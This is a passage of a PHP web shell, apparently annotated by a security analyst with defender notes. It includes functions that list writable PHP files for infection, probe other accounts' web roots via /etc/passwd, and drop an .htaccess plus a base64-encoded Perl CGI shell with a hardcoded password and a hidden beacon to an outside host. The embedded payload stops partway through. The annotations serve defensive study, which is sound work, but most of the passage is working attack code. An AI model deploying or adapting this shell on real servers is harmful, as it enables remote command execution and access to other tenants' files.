   * parameter it prints a confirmation form and link. Despite the name, the code visible here
   * writes to no file: it only enumerates candidates.
   *
   * Defender notes: the printed list is the set of PHP files the web server account can
   * overwrite. On a hardened host that list is empty: application code is owned by a different
   * account and is read-only to the web server. File-integrity monitoring over the document
   * root covers the case where it is not.
   */
  1455. function actionInfect() {
  1456. printHeader();
  1457. echo '<h1>Infect</h1><div class=content>';
  1458. if($_POST['p1'] == 'infect') {
  1459. $target=$_SERVER['DOCUMENT_ROOT'];
  // ListFiles($dir): recursive directory walk returning a flat array of file paths. It returns
  // nothing (null) when opendir() fails; the recursive call guards that with is_array(), the
  // top-level foreach below does not. Declared inside the if, so it is defined only on this path.
  1460. function ListFiles($dir) {
  1461. if($dh = opendir($dir)) {
  1462. $files = Array();
  1463. $inner_files = Array();
  // The loop condition is a truthiness test, so a directory entry named "0" ends it early.
  1464. while($file = readdir($dh)) {
  1465. if($file != "." && $file != "..") {
  1466. if(is_dir($dir . "/" . $file)) {
  1467. $inner_files = ListFiles($dir . "/" . $file);
  1468. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1469. } else {
  1470. array_push($files, $dir . "/" . $file);
  1471. }
  1472. }
  1473. }
  1474. closedir($dh);
  1475. return $files;
  1476. }
  1477. }
  1478. foreach (ListFiles($target) as $key=>$file){
  // Extension test on the last four characters of the path.
  1479. $nFile = substr($file, -4, 4);
  1480. if($nFile == ".php" ){
  // Skips the shell's own path; only files writable by this process are listed.
  1481. if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
  1482. echo "$file<br>";
  // $i is never initialised; it stays unset (prints as empty) when nothing matches.
  1483. $i++;
  1484. }
  1485. }
  1486. }
  1487. echo "<font color=red size=14>$i</font>";
  1488. }else{
  // Confirmation step: the link calls g(null,null,'infect'), which presumably posts p1=infect
  // (g() is defined elsewhere).
  1489. echo "<form method=post><input type=submit value=Infect name=infet></form>";
  1490. echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  1491. }
  1492. printFooter();
  1493. }
  1494.  
  1495.  
  1496. /* additional adds */
  1497.  
  /*
   * actionReadable(): lists other accounts' web roots that this process can read
   * (analyst annotation).
   *
   * Stops when safe_mode is on, opens /etc/passwd, and for every line after the first 36 takes
   * the text before the first ':' as a user name and tests whether /home/<user>/public_html/
   * is readable. Matching names and paths are collected and the paths printed in a <textarea>.
   * The heading says "Subdomain" and the output announces a search for passwords in config
   * files, but the code visible here only prints directory paths; $conf is never used.
   *
   * Defender notes: every path printed means the web server account can read another tenant's
   * document root. Per-account isolation is the control that empties this list: a separate uid
   * per site, home directories that are not world-readable, and open_basedir.
   */
  1498. function actionReadable(){
  1499. printHeader();
  1500. echo '<h1>Subdomain</h1><div class=content>';
  // `==` binds tighter than `=`, so $sm first receives the boolean result of the comparison;
  // when that is true it is overwritten with 'off', otherwise the script dies here.
  1501. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1502. set_time_limit(0);
  1503. ###################
  1504. @$passwd = fopen('/etc/passwd','r');
  1505. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1506. $pub = array();
  1507. $users = array();
  1508. $conf = array();
  1509. $i = 0;
  1510. while(!feof($passwd))
  1511. {
  1512. $str = fgets($passwd);
  // Fixed line offset, presumably meant to pass over system accounts; no uid is checked.
  1513. if ($i > 35)
  1514. {
  1515. $pos = strpos($str,':');
  1516. $username = substr($str,0,$pos);
  1517. $dirz = '/home/'.$username.'/public_html/';
  1518. if (($username != ''))
  1519. {
  // is_readable() is evaluated as the current (web server) process, so a hit reflects the
  // directory permissions as that account sees them.
  1520. if (is_readable($dirz))
  1521. {
  1522. array_push($users,$username);
  1523. array_push($pub,$dirz);
  1524. }
  1525. }
  1526. }
  1527. $i++;
  1528. }
  1529. ###################
  1530. echo '<br><br><textarea rows="20%" cols="100%" class="output" >';
  // $users and $pub are filled together, so both counts are the number of readable directories,
  // not the number of /etc/passwd entries.
  1531. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  1532. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  1533. echo "[~] Searching for passwords in config files...\n\n";
  1534. foreach ($users as $user)
  1535. {
  1536. $path = "/home/$user/public_html/";
  1537. echo "$path \n";
  1538. }
  1539. echo "\n";
  1540. echo "[+] Done...\n";
  1541. echo '</textarea><br></body></html>';
  1542.  
  1543. echo '</div>';
  1544. printFooter();
  1545. }
  1546.  
  1547. function actionCgiShell(){
  1548. printHeader();
  1549. echo '<h1>Cgitelnet</h1><div class=content>';
  1550.  
  1551. mkdir('cgitelnet1', 0755);
  1552. chdir('cgitelnet1');
  1553. $kokdosya = ".htaccess";
  1554. $dosya_adi = "$kokdosya";
  1555. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  1556. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  1557.  
  1558. AddType application/x-httpd-cgi .cin
  1559.  
  1560. AddHandler cgi-script .cin
  1561. AddHandler cgi-script .cin";
  1562. fwrite ( $dosya , $metin ) ;
  1563. fclose ($dosya);
  1564. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
  1565. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1566. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
  1567. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1568. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
  1569. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1570. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
  1571. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
  1572. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1573. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
  1574. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
  1575. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
  1576. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
  1577. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
  1578. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
  1579. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
  1580. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
  1581. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
  1582. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
  1583. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
  1584. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
  1585. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
  1586. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
  1587. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
  1588. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
  1589. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
  1590. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
  1591. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
  1592. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
  1593. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
  1594. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
  1595. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
  1596. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
  1597. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
  1598. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1599. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
  1600. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
  1601. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
  1602. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
  1603. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
  1604. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
  1605. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
  1606. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1607. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
  1608. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
  1609. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
  1610. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
  1611. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
  1612. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
  1613. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
  1614. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
  1615. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
  1616. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
  1617. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
  1618. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
  1619. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
  1620. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
  1621. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
  1622. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
  1623. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
  1624. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
  1625. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
  1626. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
  1627. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
  1628. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
  1629. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
  1630. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
  1631. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
  1632. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
  1633. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
  1634. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1635. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
  1636. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
  1637. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1638. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
  1639. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
  1640. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
  1641. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
  1642. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
  1643. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
  1644. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
  1645. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
  1646. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
  1647. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
  1648. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
  1649. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
  1650. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
  1651. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
  1652. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
  1653. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
  1654. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
  1655. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
  1656. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
  1657. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
  1658. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
  1659. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
  1660. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
  1661. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
  1662. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1663. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
  1664. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1665. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
  1666. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
  1667. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
  1668. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
  1669. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
  1670. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
  1671. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1672. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
  1673. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1674. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1675. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
  1676. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
  1677. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1678. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
  1679. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1680. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1681. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
  1682. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
  1683. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
  1684. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
  1685. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
  1686. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
  1687. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
  1688. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1689. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
  1690. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1691. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
  1692. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1693. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1694. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
  1695. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
  1696. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1697. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
  1698. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
  1699. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
  1700. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1701. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
  1702. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1703. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1704. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
  1705. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
  1706. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1707. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
  1708. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1709. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
  1710. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
  1711. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
  1712. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
  1713. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1714. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
  1715. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
  1716. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
  1717. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
  1718. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
  1719. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
